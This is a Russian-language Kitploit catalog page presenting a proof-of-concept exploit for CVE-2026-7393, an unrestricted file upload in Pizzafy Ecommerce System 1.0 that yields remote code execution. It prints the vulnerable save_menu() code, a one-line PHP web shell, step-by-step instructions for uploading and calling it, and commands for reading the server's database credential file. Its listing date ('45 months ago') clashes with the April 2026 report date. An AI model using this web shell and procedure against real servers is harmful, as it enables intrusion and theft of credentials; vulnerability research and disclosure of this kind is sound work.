Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-7393-RCE — Доказательство концепции эксплуатации для CVE-2026-7393: неограниченная загрузка файлов в Pizzafy Ecommerce System 1.0, позволяющая аутентифицированным администраторам загружать PHP-вебшелл и добиваться удалённого выполнения кода. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-7393-rce
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

Доказательство концепции эксплуатации для CVE-2026-7393: неограниченная загрузка файлов в Pizzafy Ecommerce System 1.0, позволяющая аутентифицированным администраторам загружать PHP-вебшелл и добиваться удалённого выполнения кода.

Репозиторий
45 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Pizzafy Ecommerce System 1.0 – Неограниченная загрузка файлов в save_menu() приводит к удалённому выполнению кода

Детали

ПолеЗначение
ПроизводительSourceCodester
URL производителяhttps://www.sourcecodester.com
ПродуктPizzafy Ecommerce System using PHP and MySQL
URL продуктаhttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
Версия1.0
УязвимостьНеограниченная загрузка файлов → Удалённое выполнение кода
CWECWE-434
Оценка CVSSv37.8 (Высокая)
Вектор атакиСетевой
Требуется аутентификацияДа (Администратор)
Взаимодействие с пользователемНе требуется
ИсследовательImad Alvi
Дата2026-04-12

Затронутый компонент

Файл: Pizzafy/admin/admin_class_novo.php → функция save_menu()
Параметр: img (FILE)
Путь загрузки: Pizzafy/assets/img/


Описание

Функция save_menu() в Pizzafy Ecommerce System 1.0 обрабатывает загрузку изображений для позиций меню без выполнения какой-либо проверки типа файлов. Приложение извлекает расширение файла с помощью pathinfo(), но фактически никогда не проверяет и не ограничивает допустимые типы файлов перед перемещением загруженного файла в каталог assets/img/, доступный через веб. Аутентифицированный администратор может загрузить PHP-веб-шелл, замаскированный под изображение меню, а затем напрямую обратиться к нему через браузер, чтобы добиться удалённого выполнения кода на сервере.

Уязвимый код в admin_class_novo.php:

function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}

Доказательство концепции

Шаг 1 — Создание PHP-веб-шелла

Создайте файл с именем shell_web2.php со следующим содержимым:

<?php echo shell_exec($_GET['cmd']); ?>

Шаг 2 — Загрузка веб-шелла через управление меню

Войдите как администратор и перейдите по адресу:

http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

Заполните форму меню любыми допустимыми значениями и выберите shell_web2.php в качестве файла изображения. Нажмите Сохранить.

Скриншот 2026-04-12 171202

Теперь шелл отображается как позиция меню на странице для клиентов.

Скриншот 2026-04-12 171236

Шаг 3 — Поиск загруженного шелла

Перейдите в каталог assets — листинг каталога включён (CWE-548):

http://192.168.0.9/pizzafy/Pizzafy/assets/img/

Загруженный PHP-шелл виден в листинге каталога.

Скриншот 2026-04-12 171300

Шаг 4 — Выполнение удалённых команд

Обратитесь к загруженному шеллу напрямую и передавайте системные команды через параметр cmd:

http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

Ответ — команда ОС, выполненная на сервере:

desktop-g1i9np3\dell
Скриншот 2026-04-12 171313

Дополнительные команды

?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

Последствия

Аутентифицированный администратор может:

  • Загружать произвольные PHP-файлы на веб-сервер
  • Выполнять любые команды уровня ОС на сервере
  • Читать конфиденциальные файлы, включая учётные данные базы данных
  • Устанавливать reverse shell для полного постоянного доступа
  • Полностью скомпрометировать сервер

Примечание о листинге каталога (CWE-548)

В каталоге assets/img/ включён листинг каталога, что позволяет неаутентифицированным пользователям просматривать все загруженные файлы, включая веб-шелл. Это усугубляет серьёзность уязвимости загрузки файлов.


Ссылки

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-434: Неограниченная загрузка файла с опасным типом
  • CWE-548: Раскрытие информации через листинг каталога
Скачать инструмент